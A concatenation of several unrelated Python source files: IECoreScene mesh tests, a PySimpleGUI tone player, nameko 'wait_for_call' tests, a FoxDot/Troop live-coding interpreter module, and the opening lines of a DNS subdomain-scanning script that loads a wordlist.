self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData( [ imath.V3f(1), imath.V3f(2), imath.V3f(3) ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData( [ imath.V3f(1), imath.V3f(2), imath.V3f(3), imath.V3f(4) ] ) ) ) )
def testPrimitiveVariableIndicesValidity( self ) :
m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) )
# only vector data
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatData( 1 ), IECore.IntVectorData( [ 0 ] ) ) ) )
# constant needs to be vector data if there are indices
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatData( 1 ), IECore.IntVectorData( [ 0 ] ) ) ) )
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
# indices must be in range
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 1 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 1 ] ) ) ) )
# indices size matches interpolation, regardless of data size
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0, 0, 0 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0, 0, 0, 0 ] ) ) ) )
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
# except for constant which can have any number of indices
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0, 0 ] ) ) ) )
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) ) ) )
def testVariableIndexedView( self ) :
IECoreScene.testVariableIndexedView()
@unittest.skipIf( IECore.TestUtil.inMacCI(), "Mac CI is too slow for reliable timing" )
def testCancelLoading( self ) :
strip = IECoreScene.MeshPrimitive.createPlane( imath.Box2f( imath.V2f( 0 ), imath.V2f( 100000, 1 ) ), imath.V2i( 1000000, 1 ) )
testData = IECore.FloatVectorData( [0] * ( len( strip["P"].data ) ) )
for i in range( 10 ):
q = IECore.FloatVectorData( testData )
q[0] = i
strip["var%i" % i] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, q )
saveIO = IECore.MemoryIndexedIO( IECore.CharVectorData(), IECore.IndexedIO.OpenMode.Write )
strip.save( saveIO, "test" )
loadIO = IECore.MemoryIndexedIO( saveIO.buffer(), IECore.IndexedIO.OpenMode.Read )
canceller = IECore.Canceller()
cancelled = [False]
def backgroundRun():
try:
IECore.Object.load( loadIO, "test", canceller )
except IECore.Cancelled:
cancelled[0] = True
thread = threading.Thread(target=backgroundRun, args=())
startTime = time.time()
thread.start()
time.sleep( 0.05 )
canceller.cancel()
thread.join()
self.assertLess( time.time() - startTime, 0.1 )
self.assertTrue( cancelled[0] )
if __name__ == "__main__":
unittest.main()
|
BlasterAmpTonePlayer.py
|
"""
**** This generates a High Quality 16 Bit Audio Tone Though a Sound Blaster USB Dongle *****
Code based on this Internet thread,
https://stackoverflow.com/questions/974071/python-library-for-playing-fixed-frequency-sound
The soundfile module (https://PySoundFile.readthedocs.io/) has to be installed!
The official installer is broken (as of March 2022), the install fix and replacement wheel file is shown here in this video,
https://www.youtube.com/watch?v=t6zdZIT4MNA
The fixed wheel files are here,
https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyaudio
Totally free script, but remember,
"Written by an infinite number of Monkeys in an infinite amount of time,
...so beware."
"""
#from tkinter.constants import FALSE
import pyaudio
import struct
import math
import threading
import time
import PySimpleGUI as sg
# Setup audio stream
FORMAT = pyaudio.paInt16
CHANNELS = 2
RATE = 44100
# Instantiate PyAudio
pa = pyaudio.PyAudio()
# Global Flag
is_playing = False
# Local Methods
def data_for_tone(frequency: float, time: float = None, volume: float = 1.0):
"""get frames for a fixed frequency for a specified time or
number of frames, if frame_count is specified, the specified
time is ignored"""
frame_count = int(RATE * time)
# limit volume
if volume > 1.0:
volume = 1.0
remainder_frames = frame_count % RATE
wavedata = []
for i in range(frame_count):
a = RATE / frequency # number of frames per wave
b = i / a
# explanation for b
# considering one wave, what part of the wave should this be
# if we graph the sine wave in a
# displacement vs i graph for the particle
# where 0 is the beginning of the sine wave and
# 1 the end of the sine wave
# which part is "i" is denoted by b
# for clarity you might use
# though this is redundant since math.sin is a looping function
# b = b - int(b)
c = b * (1.0 * math.pi)
# explanation for c
# now we map b to between 0 and 2*math.PI
# since 0 - 2*PI, 2*PI - 4*PI, ...
# are the repeating domains of the sin wave (so the decimal values will
# also be mapped accordingly,
# and the integral values will be multiplied
# by 2*PI and since sin(n*2*PI) is zero where n is an integer)
d = math.sin(c) * 32767 * volume
e = int(d)
wavedata.append(e)
for i in range(remainder_frames):
wavedata.append(0)
number_of_bytes = str(len(wavedata))
wavedata = struct.pack(number_of_bytes + 'h', *wavedata)
return wavedata
def play():
# This is the actual play-loop thread
global is_playing
global stream
global frame_data
while(is_playing == True):
stream.write(frame_data)
# Clean up streams on playing stop
stream.stop_stream()
stream.close()
def loop_start(frequency, volume):
global is_playing
global stream
global frame_data
if is_playing == False:
frame_data = data_for_tone(frequency=frequency, time=1, volume=volume)
stream = pa.open(format=FORMAT, channels=CHANNELS,
rate=RATE, output=True)
is_playing = True
audio_loop_thread = threading.Thread(target=play)
audio_loop_thread.start()
def loop_stop():
global is_playing
is_playing = False
if __name__ == "__main__":
# GUI Layout Design
layout = [[sg.Text('Frequency Hz')],
[sg.Slider(orientation='horizontal', key='Frequency', enable_events=True, range=(1000, 10000), resolution=1000, default_value=2000, size=(60, 20))],
[sg.Text('')],
[sg.Text('Volume %')],
[sg.Slider(orientation='horizontal', key='Volume', enable_events=True, range=(1, 100), resolution=1, default_value=50, size=(60, 20))],
[sg.Text('')],
[sg.Button('Play', size=(10, 1)), sg.Button('Stop', size=(10, 1)), sg.Button('Exit', size=(10, 1))]
]
# GUI Window Design
window = sg.Window('Play A Tone With Python', layout,
default_element_size=(12, 1),
text_justification='l',
auto_size_text=False,
auto_size_buttons=False,
keep_on_top=True,
grab_anywhere=False,
default_button_element_size=(12, 1),
finalize=True)
# GUI Initial Conditions
window['Stop'].update(disabled=True)
# GUI Window Event Loop
while True:
# Read any window events
event, values = window.Read()
if event == 'Exit' or event == sg.WIN_CLOSED:
loop_stop()
break
if event == 'Play':
window['Stop'].update(disabled=False)
window['Play'].update(disabled=True)
frequency = int(values['Frequency'])
volume = float(values['Volume'] / 100.0)
loop_start(frequency, volume)
continue
if event == 'Stop':
window['Stop'].update(disabled=True)
window['Play'].update(disabled=False)
loop_stop()
continue
if event == 'Frequency':
window['Stop'].update(disabled=True)
window['Play'].update(disabled=False)
loop_stop()
continue
if event == 'Volume':
window['Stop'].update(disabled=True)
window['Play'].update(disabled=False)
loop_stop()
continue
# GUI Exit
window.Close()
# ----- Fini -----
|
test_waiting.py
|
import sys
import time
from threading import Thread
import pytest
from mock import ANY, Mock, call, patch
from nameko.testing.waiting import WaitResult, wait_for_call
@pytest.fixture
def forever():
value = [True]
yield value
value.pop()
class TestPatchWaitUseCases(object):
def test_wait_for_specific_result(self, forever):
class Counter(object):
value = 0
def count(self):
self.value += 1
return self.value
counter = Counter()
def count_forever():
while forever:
counter.count()
time.sleep(0)
def cb(args, kwargs, res, exc_info):
return res == 10
with wait_for_call(counter, 'count', callback=cb) as result:
Thread(target=count_forever).start()
assert result.get() == 10
def test_wait_until_called_with_argument(self, forever):
class CounterWithSet(object):
value = 0
def set(self, value):
self.value = value
return self.value
counter = CounterWithSet()
def increment_forever_via_set():
while forever:
counter.set(counter.value + 1)
time.sleep(0)
def cb(args, kwargs, res, exc_info):
return args == (10,)
with wait_for_call(counter, 'set', callback=cb) as result:
Thread(target=increment_forever_via_set).start()
assert result.get() == 10
def test_wait_until_raises(self, forever):
class LimitExceeded(Exception):
pass
class CounterWithLimit(object):
def __init__(self, limit):
self.value = 0
self.limit = limit
def count(self):
self.value += 1
if self.value >= self.limit:
raise LimitExceeded(self.limit)
return self.value
limit = 10
counter = CounterWithLimit(limit)
def count_forever():
while forever:
counter.count()
time.sleep(0)
def cb(args, kwargs, res, exc_info):
return exc_info is not None
with wait_for_call(counter, 'count', callback=cb) as result:
Thread(target=count_forever).start()
with pytest.raises(LimitExceeded):
result.get()
def test_wait_until_stops_raising(self, forever):
class ThresholdNotReached(Exception):
pass
class CounterWithThreshold(object):
def __init__(self, threshold):
self.value = 0
self.threshold = threshold
def count(self):
self.value += 1
if self.value < self.threshold:
raise ThresholdNotReached(self.threshold)
return self.value
threshold = 10
counter = CounterWithThreshold(threshold)
def count_forever():
while forever:
try:
counter.count()
except ThresholdNotReached:
pass
time.sleep(0)
def cb(args, kwargs, res, exc_info):
return exc_info is None
with wait_for_call(counter, 'count', callback=cb) as result:
Thread(target=count_forever).start()
assert result.get() == threshold
class TestPatchWait(object):
def test_direct(self):
class Echo(object):
def upper(self, arg):
return arg.upper()
echo = Echo()
arg = "hello"
with wait_for_call(echo, 'upper'):
res = echo.upper(arg)
assert res == "HELLO"
def test_indirect(self):
class Echo(object):
def proxy(self, arg):
return self.upper(arg)
def upper(self, arg):
return arg.upper()
echo = Echo()
arg = "hello"
with wait_for_call(echo, 'upper'):
assert echo.proxy(arg) == "HELLO"
def test_patch_class(self):
class Echo(object):
def upper(self, arg):
return arg.upper()
echo = Echo()
arg = "hello"
with wait_for_call(Echo, 'upper'):
res = echo.upper(arg)
assert res == "HELLO"
def test_result(self):
class Echo(object):
def upper(self, arg):
return arg.upper()
echo = Echo()
arg = "hello"
with wait_for_call(echo, 'upper') as result:
res = echo.upper(arg)
assert result.get() == res
def test_result_not_ready(self):
class Echo(object):
def upper(self, arg):
return arg.upper()
echo = Echo()
arg = "hello"
with wait_for_call(echo, 'upper') as result:
with pytest.raises(result.NotReady):
result.get()
res = echo.upper(arg)
assert result.get() == res
def test_result_is_none(self):
class Echo(object):
def nothing(self):
return None
echo = Echo()
with wait_for_call(echo, 'nothing') as result:
res = echo.nothing()
assert res is None
assert result.get() is None
assert result.has_result is True
def test_wrapped_method_raises(self):
class EchoException(Exception):
pass
class Echo(object):
def error(self):
raise EchoException("error!")
echo = Echo()
with wait_for_call(echo, 'error'):
with pytest.raises(EchoException):
echo.error()
def test_result_get_raises(self):
class EchoException(Exception):
pass
class Echo(object):
def error(self):
raise EchoException("error!")
echo = Echo()
with wait_for_call(echo, 'error') as result:
with pytest.raises(EchoException):
echo.error()
with pytest.raises(EchoException):
result.get()
def test_callback(self):
class Echo(object):
def upper(self, arg):
return arg.upper()
echo = Echo()
arg = "hello"
callback = Mock()
callback.return_value = True
with wait_for_call(echo, 'upper', callback):
res = echo.upper(arg)
assert res == "HELLO"
assert callback.called
assert callback.call_args_list == [call((arg,), {}, res, None)]
def test_callback_multiple_calls(self):
class Echo(object):
count = 0
def upper(self, arg):
self.count += 1
return "{}-{}".format(arg.upper(), self.count)
echo = Echo()
arg = "hello"
callback = Mock()
callback.side_effect = [False, True]
with wait_for_call(echo, 'upper', callback):
res1 = echo.upper(arg)
assert res1 == "HELLO-1"
res2 = echo.upper(arg)
assert res2 == "HELLO-2"
assert callback.called
assert callback.call_args_list == [
call((arg,), {}, res1, None),
call((arg,), {}, res2, None),
]
def test_callback_with_exception(self):
class EchoException(Exception):
pass
class Echo(object):
def error(self):
raise exc
echo = Echo()
exc = EchoException("error!")
callback = Mock()
callback.return_value = True
with wait_for_call(echo, 'error', callback):
with pytest.raises(EchoException):
echo.error()
assert callback.called
assert callback.call_args_list == [
call((), {}, None, (EchoException, exc, ANY))
]
def test_callback_with_exception_multiple_calls(self):
class EchoException(Exception):
pass
class Echo(object):
def error(self):
raise exc
echo = Echo()
exc = EchoException("error!")
callback = Mock()
callback.side_effect = [False, True]
with wait_for_call(echo, 'error', callback):
with pytest.raises(EchoException):
echo.error()
with pytest.raises(EchoException):
echo.error()
assert callback.called
assert callback.call_args_list == [
call((), {}, None, (EchoException, exc, ANY)),
call((), {}, None, (EchoException, exc, ANY))
]
def test_with_new_thread(self):
class Echo(object):
def proxy(self, arg):
Thread(target=self.upper, args=(arg,)).start()
def upper(self, arg):
return arg.upper()
echo = Echo()
arg = "hello"
callback = Mock()
callback.return_value = True
with wait_for_call(echo, 'upper', callback):
res = echo.proxy(arg)
assert res is None
assert callback.called
assert callback.call_args_list == [call((arg,), {}, "HELLO", None)]
def test_target_as_mock(self):
class Klass(object):
def __init__(self):
self.attr = "value"
def method(self):
return self.attr.upper()
instance = Klass()
with patch.object(instance, 'attr') as patched_attr:
with wait_for_call(patched_attr, 'upper'):
instance.method()
assert patched_attr.upper.called
assert instance.attr.upper.called
class TestWaitResult(object):
class CustomError(Exception):
pass
@pytest.fixture
def exc_info(self):
try:
raise self.CustomError("whoops")
except:
exc_info = sys.exc_info()
return exc_info
def test_has_result(self):
result = WaitResult()
assert result.has_result is False
result.send("ok", None)
assert result.has_result is True
def test_has_exception(self, exc_info):
result = WaitResult()
assert result.has_result is False
result.send(None, exc_info)
assert result.has_result is True
def test_send_multiple_times(self):
result = WaitResult()
result.send(1, None)
result.send(2, None)
assert result.get() == 1
def test_get_result_multiple_times(self):
result = WaitResult()
result.send(1, None)
assert result.get() == 1
assert result.get() == 1
def test_get_raises(self, exc_info):
result = WaitResult()
result.send(1, exc_info)
with pytest.raises(self.CustomError):
result.get()
|
interpreter.py
|
"""
Interpreter
-----------
Runs a block of FoxDot code. Designed to be overloaded
for other language communication
"""
from __future__ import absolute_import
from .config import *
from .message import MSG_CONSOLE
from subprocess import Popen
from subprocess import PIPE, STDOUT
from datetime import datetime
# Import OSC library depending on Python version
if PY_VERSION == 2:
from . import OSC
else:
from . import OSC3 as OSC
try:
broken_pipe_exception = BrokenPipeError
except NameError: # Python 2
broken_pipe_exception = IOError
CREATE_NO_WINDOW = 0x08000000 if SYSTEM == WINDOWS else 0
import sys
import re
import time
import threading
import shlex
import tempfile
import os, os.path
DATE_FORMAT = "%Y-%m-%d %H:%M:%S.%f"
def compile_regex(kw):
""" Takes a list of strings and returns a regex that
matches each one """
return re.compile(r"(?<![a-zA-Z.])(" + "|".join(kw) + ")(?![a-zA-Z])")
SEPARATOR = ":"; _ = " %s " % SEPARATOR
def colour_format(text, colour):
return '<colour="{}">{}</colour>'.format(colour, text)
## dummy interpreter
class DummyInterpreter:
name = None
def __init__(self, *args, **kwargs):
self.re={}
self.syntax_lang = langtypes[kwargs.get("syntax", -1)]
# If using another snytax, use the appropriate regex
if self.syntax_lang != self.__class__:
self.re = {"tag_bold": self.syntax_lang.find_keyword, "tag_italic": self.syntax_lang.find_comment}
self.syntax_lang.setup()
else:
self.syntax_lang = None
def __repr__(self):
return self.name if name is not None else repr(self.__class__.__name__)
def get_block_of_code(self, text, index):
""" Returns the start and end line numbers of the text to evaluate when pressing Ctrl+Return. """
# Get start and end of the buffer
start, end = "1.0", text.index("end")
lastline = int(end.split('.')[0]) + 1
# Indicies of block to execute
block = [0,0]
# 1. Get position of cursor
cur_x, cur_y = index.split(".")
cur_x, cur_y = int(cur_x), int(cur_y)
# 2. Go through line by line (back) and see what it's value is
for line in range(cur_x, 0, -1):
if not text.get("%d.0" % line, "%d.end" % line).strip():
break
block[0] = line
# 3. Iterate forwards until we get two \n\n or index==END
for line in range(cur_x, lastline):
if not text.get("%d.0" % line, "%d.end" % line).strip():
break
block[1] = line
return block
def evaluate(self, string, *args, **kwargs):
self.print_stdin(string, *args, **kwargs)
return
def start(self):
return self
def stdout(self, *args, **kwargs):
pass
def kill(self, *args, **kwargs):
pass
def print_stdin(self, string, name=None, colour="White"):
""" Handles the printing of the execute code to screen with coloured
names and formatting """
# Split on newlines
string = [line.replace("\n", "") for line in string.split("\n") if len(line.strip()) > 0]
if len(string) > 0 and name is not None:
name = str(name)
print(colour_format(name, colour) + _ + string[0])
# Use ... for the remainder of the lines
n = len(name)
for i in range(1,len(string)):
sys.stdout.write(colour_format("." * n, colour) + _ + string[i])
sys.stdout.flush()
return
# Syntax highlighting methods
def find_keyword(self, string):
return self.syntax_lang.find_keyword(string)
def find_comment(self, string):
return self.syntax_lang.find_comment(string)
def stop_sound(self):
""" Returns the string for stopping all sound in a language """
return self.syntax_lang.stop_sound() if self.syntax_lang != None else ""
@staticmethod
def format(string):
""" Method to be overloaded in sub-classes for formatting strings to be evaluated """
return str(string) + "\n"
class Interpreter(DummyInterpreter):
id = 99
lang = None
clock = None
boot_file = None
keyword_regex = compile_regex([])
comment_regex = compile_regex([])
stdout = None
stdout_thread = None
filetype = ".txt"
client = None
def __init__(self, client, path, args=""):
self.client = client
self.re = {"tag_bold": self.find_keyword, "tag_italic": self.find_comment}
self.path = shlex.split(path)
self.args = self._get_args(args)
self.f_out = tempfile.TemporaryFile("w+", 1) # buffering = 1
self.is_alive = True
self.setup()
@staticmethod
def _get_args(args):
if isinstance(args, str):
args = shlex.split(args)
elif isinstance(args, list) and len(args) == 1:
args = shlex.split(args[0])
return args
def setup(self):
""" Overloaded in sub-classes """
return
def start(self):
""" Opens the process with the interpreter language """
try:
self.lang = Popen(self.path + self.args, shell=False, universal_newlines=True, bufsize=1,
stdin=PIPE,
stdout=self.f_out,
stderr=self.f_out,
creationflags=CREATE_NO_WINDOW)
self.stdout_thread = threading.Thread(target=self.stdout)
self.stdout_thread.start()
except OSError:
raise ExecutableNotFoundError(self.get_path_as_string())
self.load_bootfile()
return self
def load_bootfile(self):
"""
Loads the specified boot file. If it exists, it is defined
in the class but can be overridden in conf/boot.txt.
"""
self.boot_file = self.get_custom_bootfile()
# Load data
if self.boot_file is not None:
with open(self.boot_file) as f:
for line in f.split("\n"):
self.lang.stdin.write(line.rstrip() + "\n")
self.lang.stdin.flush()
return
def get_custom_bootfile(self):
"""
Get the path of a specific custom bootfile or None if it
does not exist.
"""
# Check boot file for overload
if self.name is not None and os.path.exists(BOOT_CONFIG_FILE):
with open(BOOT_CONFIG_FILE) as f:
for line in f.readlines():
if line.startswith(self.name):
data = line.split("=")
path = data[-1].strip()
if path not in ("''", '""'):
return path
return None
def get_path_as_string(self):
""" Returns the executable input as a string """
return " ".join(self.path)
@classmethod
def find_keyword(cls, string):
return [(match.start(), match.end()) for match in cls.keyword_regex.finditer(string)]
@classmethod
def find_comment(cls, string):
return [(match.start(), match.end()) for match in cls.comment_regex.finditer(string)]
def write_stdout(self, string):
if self.is_alive:
self.lang.stdin.write(self.format(string))
self.lang.stdin.flush()
return
def evaluate(self, string, *args, **kwargs):
""" Sends a string to the stdin and prints the text to the console """
# TODO -- get control of stdout
# Print to console
self.print_stdin(string, *args, **kwargs)
# Pipe to the subprocess
self.write_stdout(string)
return
def stdout(self, text=""):
""" Continually reads the stdout from the self.lang process """
while self.is_alive:
if self.lang.poll():
self.is_alive = False
break
try:
# Check contents of file
# TODO -- get control of f_out and stdout
self.f_out.seek(0)
message = []
for stdout_line in iter(self.f_out.readline, ""):
line = stdout_line.rstrip()
sys.stdout.write(line)
message.append(line)
# clear tmpfile
self.f_out.truncate(0)
# Send console contents to the server
if len(message) > 0 and self.client.is_master():
self.client.send(MSG_CONSOLE(self.client.id, "\n".join(message)))
time.sleep(0.05)
except ValueError as e:
print(e)
return
return
def kill(self):
""" Stops communicating with the subprocess """
# End process if not done so already
self.is_alive = False
if self.lang.poll() is None:
self.lang.communicate()
class CustomInterpreter:
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
def __call__(self):
return Interpreter(*self.args, **self.kwargs)
class BuiltinInterpreter(Interpreter):
def __init__(self, client, args):
Interpreter.__init__(self, client, self.path, args)
class FoxDotInterpreter(BuiltinInterpreter):
filetype=".py"
path = "{} -u -m FoxDot --pipe".format(PYTHON_EXECUTABLE)
name = "FoxDot"
@classmethod
def setup(cls):
cls.keywords = ["Clock", "Scale", "Root", "var", "linvar", '>>', 'print']
cls.keyword_regex = compile_regex(cls.keywords)
@staticmethod
def format(string):
return "{}\n\n".format(string)
@classmethod
def find_comment(cls, string):
instring, instring_char = False, ""
for i, char in enumerate(string):
if char in ('"', "'"):
if instring:
if char == instring_char:
instring = False
instring_char = ""
else:
instring = True
instring_char = char
elif char == "#":
if not instring:
return [(i, len(string))]
return []
def kill(self):
self.evaluate(self.stop_sound())
Interpreter.kill(self)
return
@classmethod
def stop_sound(cls):
return "Clock.clear()"
class TidalInterpreter(BuiltinInterpreter):
path = 'ghci'
filetype = ".tidal"
name = "TidalCycles"
def start(self):
# Use ghc-pkg to find location of boot-tidal
try:
process = Popen(["ghc-pkg", "field", "tidal", "data-dir"], stdout=PIPE, universal_newlines=True)
output = process.communicate()[0]
data_dir = output.split("\n")[0].replace("data-dir:", "").strip()
self.boot_file = os.path.join(data_dir, "BootTidal.hs")
except FileNotFoundError:
# Set to None - might be defined in bootup file
self.boot_file = None
Interpreter.start(self)
return self
def load_bootfile(self):
"""
Overload for Tidal to use :script /path/to/file
instead of loading each line of a boot file one by
one
"""
self.boot_file = (self.get_custom_bootfile() or self.boot_file)
if self.boot_file:
self.write_stdout(":script {}".format(self.boot_file))
else:
err = "Could not find BootTidal.hs! You can specify the path in your Troop boot config file: {}".format(BOOT_CONFIG_FILE)
raise(FileNotFoundError(err))
return
@classmethod
def setup(cls):
cls.keywords = ["d{}".format(n) for n in range(1,17)] + ["\$", "#", "hush", "solo", "silence"]
cls.keyword_regex = compile_regex(cls.keywords)
return
@classmethod
def find_comment(cls, string):
instring, instring_char = False, ""
for i, char in enumerate(string):
if char in ('"', "'"):
if instring:
if char == instring_char:
instring = False
instring_char = ""
else:
instring = True
instring_char = char
elif char == "-":
if not instring and (i + 1) < len(string) and string[i + 1] == "-":
return [(i, len(string))]
return []
@staticmethod
def format(string):
""" Used to formant multiple lines in haskell """
return ":{\n"+string+"\n:}\n"
@classmethod
def stop_sound(cls):
""" Triggers the 'hush' command using Ctrl+. """
return "hush"
class StackTidalInterpreter(TidalInterpreter):
path = "stack ghci"
# Interpreters over OSC (e.g. Sonic Pi)
# -------------------------------------
class OSCInterpreter(Interpreter):
""" Class for sending messages via OSC instead of using a subprocess """
def __init__(self, *args, **kwargs):
self.re = {"tag_bold": self.find_keyword, "tag_italic": self.find_comment}
self.lang = OSC.OSCClient()
self.lang.connect((self.host, self.port))
self._osc_error = False
# Overload to not activate a server
def start(self):
return self
def kill(self):
self.evaluate(self.stop_sound())
self.lang.close()
return
def new_osc_message(self, string):
""" Overload in sub-class, return OSC.OSCMessage"""
return
def print_osc_warning_message(self):
print("Warning: No connection made to local {} OSC server instance.".format(self.__repr__()))
return
def evaluate(self, string, *args, **kwargs):
# Print to the console the message
Interpreter.print_stdin(self, string, *args, **kwargs)
# Create an osc message and send to the server
try:
self.lang.send(self.new_osc_message(string))
self._osc_error = False
except OSC.OSCClientError:
if not self._osc_error:
self.print_osc_warning_message()
self._osc_error = True
return
class SuperColliderInterpreter(OSCInterpreter):
filetype = ".scd"
host = 'localhost'
port = 57120
name = "SuperCollider"
def new_osc_message(self, string):
""" Returns OSC message for Troop Quark """
msg = OSC.OSCMessage("/troop")
msg.append([string])
return msg
@classmethod
def find_comment(cls, string):
instring, instring_char = False, ""
for i, char in enumerate(string):
if char in ('"', "'"):
if instring:
if char == instring_char:
instring = False
instring_char = ""
else:
instring = True
instring_char = char
elif char == "/":
if not instring and i < len(string) and string[i + 1] == "/":
return [(i, len(string))]
return []
@classmethod
def get_block_of_code(cls, text, index):
""" Returns the start and end line numbers of the text to evaluate when pressing Ctrl+Return. """
# Get start and end of the buffer
start, end = "1.0", text.index("end")
lastline = int(end.split('.')[0]) + 1
# Indicies of block to execute
block = [0,0]
# 1. Get position of cursor
cur_y, cur_x = index.split(".")
cur_y, cur_x = int(cur_y), int(cur_x)
left_cur_y, left_cur_x = cur_y, cur_x
right_cur_y, right_cur_x = cur_y, cur_x
# Go back to find a left bracket
while True:
new_left_cur_y, new_left_cur_x = cls.get_left_bracket(text, left_cur_y, left_cur_x)
new_right_cur_y, new_right_cur_x = cls.get_right_bracket(text, right_cur_y, right_cur_x)
if new_left_cur_y is None or new_right_cur_y is None:
block = [left_cur_y, right_cur_y + 1]
break
else:
left_cur_y, left_cur_x = new_left_cur_y, new_left_cur_x
right_cur_y, right_cur_x = new_right_cur_y, new_right_cur_x
return block
@classmethod
def get_left_bracket(cls, text, cur_y, cur_x):
count = 0
line_text = text.get("{}.{}".format(cur_y, 0), "{}.{}".format(cur_y, "end"))
for line_num in range(cur_y, 0, -1):
# Only check line if it has text
if len(line_text) > 0:
for char_num in range(cur_x - 1, -1, -1):
try:
char = line_text[char_num]
except IndexError as e:
print("left bracket, string is {}, index is {}".format(line_text, char_num))
raise(e)
if char == ")":
count += 1
elif char == "(":
if count == 0:
return line_num, char_num
else:
count -= 1
line_text = text.get("{}.{}".format(line_num - 1, 0), "{}.{}".format(line_num - 1, "end"))
cur_x = len(line_text)
return None, None
@classmethod
def get_right_bracket(cls, text, cur_y, cur_x):
num_lines = int(text.index("end").split(".")[0]) + 1
count = 0
for line_num in range(cur_y, num_lines):
line_text = text.get("{}.{}".format(line_num, 0), "{}.{}".format(line_num, "end"))
# Only check line if it has text
if len(line_text) > 0:
for char_num in range(cur_x, len(line_text)):
try:
char = line_text[char_num]
except IndexError as e:
print("right bracket, string is {}, index is {}".format(line_text, char_num))
raise(e)
if char == "(":
count += 1
if char == ")":
if count == 0:
return line_num, char_num + 1
else:
count -= 1
cur_x = 0
else:
return None, None
@classmethod
def stop_sound(cls):
return "s.freeAll"
class SonicPiInterpreter(OSCInterpreter):
filetype = ".rb"
host = 'localhost'
port = 4557
name = "Sonic-Pi"
def new_osc_message(self, string):
""" Returns OSC message for Sonic Pi """
msg = OSC.OSCMessage("/run-code")
msg.append(["0", string])
return msg
@classmethod
def find_comment(cls, string):
instring, instring_char = False, ""
for i, char in enumerate(string):
if char in ('"', "'"):
if instring:
if char == instring_char:
instring = False
instring_char = ""
else:
instring = True
instring_char = char
elif char == "#":
if not instring:
return [(i, len(string))]
return []
@classmethod
def get_block_of_code(cls, text, index):
""" Returns first and last line as Sonic Pi evaluates the whole code """
start, end = "1.0", text.index("end")
return [int(index.split(".")[0]) for index in (start, end)]
@classmethod
def stop_sound(cls):
return 'osc_send({!r}, {}, "/stop-all-jobs")'.format(cls.host, cls.port)
# Set up ID system
langtypes = { FOXDOT : FoxDotInterpreter,
TIDAL : TidalInterpreter,
TIDALSTACK : StackTidalInterpreter,
SUPERCOLLIDER : SuperColliderInterpreter,
SONICPI : SonicPiInterpreter,
DUMMY : DummyInterpreter }
for lang_id, lang_cls in langtypes.items():
lang_cls.id = lang_id
|
domainfuzzer.py
|
from dnslookup import lookup
from logger import Output, col
from threading import Thread, Lock
from env import SIGINT_handler
import time, signal, math
import random, string, sys, io, re
import dns.zone
class ScanList():
def __init__(self, args):
if args.dictionary:
try:
self.unscanned = map(unicode.strip, io.open(args.dictionary, encoding='utf-8', mode='r').readlines())
except IOError as e:
print (e)
sys.exit()
else:
self.unscanned = []
self.unscanned.insert(0,'')
self.scanned = []
self.found = []
self.n_unscanned = len(self.unscanned)
